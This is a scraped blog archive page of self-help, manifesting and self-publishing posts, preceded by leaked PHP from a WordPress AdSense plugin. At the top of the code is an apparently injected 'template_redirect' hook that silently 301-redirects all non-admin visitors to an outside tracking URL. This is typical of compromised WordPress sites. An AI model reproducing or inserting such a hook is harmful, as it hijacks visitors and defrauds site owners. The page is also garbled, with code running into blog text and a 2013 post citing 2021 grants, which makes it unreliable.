function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); if(!ADSENSEM_VERSION){die();} $_adsensem_networks['ad_adsense_classic'] = array( 'name' => 'AdSense (Classic)', 'shortname' => 'adc', 'www' => '', 'display' => false, ); /* INITIALISATION All functions in here called at startup (after other plugins have loaded, in case we need to wait for the widget-plugin). */ class Ad_AdSense_Classic extends Ad_AdSense { function Ad_AdSense_Classic(){ $this->Ad_AdSense(); } function network(){ return 'ad_adsense_classic'; } function save_settings_network() { if($_POST['adsensem-account-id']!=''){ $this->set_account_id(preg_replace('/\D/','',$_POST['adsensem-account-id'])); } $this->p['channel']=strip_tags(stripslashes($_POST['adsensem-channel'])); $this->p['adtype']=strip_tags(stripslashes($_POST['adsensem-adtype'])); $this->p['color-border']=strip_tags(stripslashes($_POST['adsensem-color-border'])); $this->p['color-title']=strip_tags(stripslashes($_POST['adsensem-color-title'])); $this->p['color-bg']=strip_tags(stripslashes($_POST['adsensem-color-bg'])); $this->p['color-text']=strip_tags(stripslashes($_POST['adsensem-color-text'])); $this->p['color-link']=strip_tags(stripslashes($_POST['adsensem-color-link'])); $this->p['uistyle']=strip_tags(stripslashes($_POST['adsensem-uistyle'])); if($_POST['adsensem-action']!='edit defaults'){ //Specific stuff for the ad/referral subtypes (cleaner) $this->save_settings_network_subtype(); } } //Processes the alternate ad options and returns correct code(complicated and needed across the adsense ads). function _render_color_code(){ $code=''; $code.= 'google_color_border = "' . $this->pd('color-border') . '"' . ";\n"; $code.= 'google_color_bg = "' . $this->pd('color-bg') . '"' . ";\n"; $code.= 'google_color_link = "' . $this->pd('color-title') . '"' . ";\n"; $code.= 'google_color_text = "' . $this->pd('color-text') . '"' . ";\n"; $code.= 'google_color_url = "' . $this->pd('color-link') . '"' . ";\n"; return $code; } function import_settings_network($code) { if(preg_match('/google_ad_channel = "(.*)"/', $code, $matches)!=0){ $_POST['adsensem-channel'] = $matches[1]; } if(preg_match('/google_color_border = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-border']=$matches[1];} if(preg_match('/google_color_bg = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-title']=$matches[1];} if(preg_match('/google_color_link = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-bg']=$matches[1];} if(preg_match('/google_color_text = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-text']=$matches[1];} if(preg_match('/google_color_url = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-link']=$matches[1];} $this->import_settings_network_subtype($code); //$this->save_settings(); now done in the main Ad_AdSense class } function import_detect_network($code){return false;} function _form_settings_styles(){ $default=array('' => 'Use Default'); $uistyle=array('0' => 'Square corners', '6' => 'Slightly rounded corners', '10' => 'Very rounded corners'); adsensem_admin::_field_select('Corner Style','uistyle',$uistyle); } function _form_settings_ad_format(){ //Google AdSense data $default=array('' => 'Use Default'); $adtypes=$this->_var_ad_types_available(); $formats=$this->_var_ad_formats_available(); //Get permitted formats for the current network adsensem_admin::_field_select('Ad Type','adtype',$adtypes); adsensem_admin::_field_select('Format','adformat',$formats); adsensem_admin::_field_input('Channel','channel',20,'Enter multiple Channels separated by + signs.'); } //Middle function _var_forms_unit(){ return array('ad_unit');} function _var_forms_column2(){ return array('colors','styles'); } //Show network-id on AdSense Classic function admin_manage_column1(){ adsensem_admin::dbxoutput($this->_var_forms_network()); adsensem_admin::dbxoutput($this->_var_forms_unit()); adsensem_admin::dbxoutput($this->_var_forms_column1()); } } require_once('class-adsense-ad.php'); //AdSense Ad units pre-slot style require_once('class-adsense-link.php'); //AdSense Link units pre-slot style require_once('class-adsense-referral.php'); //AdSense Referral units pre-slot style ?> EliteCashBlog » 2013 » October

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Posted by admin, filed under Inspiration. Date: October 28, 2013, 10:26 pm | No Comments »

Reality bites but who cares when you could be spending it being happy and abundant as opposed to just making ends meet and being depressed over money issues. So to help clear that mental (emotional) clutter is an article by John Rampton about the 25 Reasons You Are Not as Successful as You Should Be from

Posted by admin, filed under Self-Improvement. Date: October 28, 2013, 10:20 pm | No Comments »

28  Oct
Branding Power

The Secrets of 7 Successful Brands here.

Posted by admin, filed under Each One Teach One, Self-Improvement. Date: October 28, 2013, 10:01 pm | No Comments »

Read the rest of this entry »

Posted by admin, filed under Uncategorized. Date: October 28, 2013, 9:31 pm | No Comments »

A look at 21 people who failed big before becoming a success.  Click here.

Posted by admin, filed under Inspiration, Uncategorized. Date: October 28, 2013, 9:16 pm | No Comments »


Posted by admin, filed under Inspiration. Date: October 22, 2013, 10:52 pm | No Comments »

Do you have a book idea you have been dying to get published but don’t know how? Have you let the idea of not getting picked up by a major publisher discourage a writing endeavor? Well, this will come to a full stop NOW. I have published 3 books, 2 of which are available for purchase on Amazon. I would like to empower you and share how I did it and hopefully remove any fears of the process.

First things first, you will need an ISBN which is a number that basically identifies your published book. You can purchase either 1 or increments of 10 if you plan on publishing more of your work or decide to publish other people’s work (therefore making you the publisher). Here is the link for that:

Next is the EIN number which is basically a business tax ID number. This is helpful for your accounting purposes if you decide to be a vendor, etc. You will also need it if you decide to open a separate business account with whoever you bank with for your royalties, expenses, etc. It also comes in handy for other purposes such as if you need to make a wholesale purchase. Here is the link for that:
Last but not least, I used CreateSpace( to self-publish. It was easiest for me because they collaborate with Amazon so once you are ready to publish, you can opt to automatically have it available on Amazon. Now let me forewarn you, they do take a huge percentage and although It has been the most effective for me in regards to sales. Everybody and their mama have an Amazon account and even if they don’t, they still trust using their debit/credit card information there as opposed to a random, unknown site. Unless you already have a set client base with guaranteed traffic, I found this to be the easiest approach, to begin with.
Hope this helps! If you have any questions, bring them on in the comment section and I will answer in a timely manner. Best of luck!

Posted by admin, filed under Each One Teach One. Date: October 22, 2013, 10:50 pm | No Comments »

Upgrade your thoughts and begin creating abundance. Read this book and be enlightened: Advanced Manifesting: Mastering the Law of Attraction with Frequency Attunement: Use Vibrations to Manifest Money, the Lottery, Love & More by Linda West (Kindle edition). View it here.

Posted by admin, filed under Self-Improvement. Date: October 22, 2013, 10:46 pm | No Comments »

22  Oct
Instant Success

Laying The Groundwork for ‘Instant’ Success by Elle Kaplan here.

Posted by admin, filed under Each One Teach One, Inspiration. Date: October 22, 2013, 10:32 pm | No Comments »


Here is an informative article from the Chamber of Commerce on government grants for small businesses in 2021. Check it out here.

Posted by admin, filed under Financial Advice. Date: October 22, 2013, 10:16 pm | No Comments »

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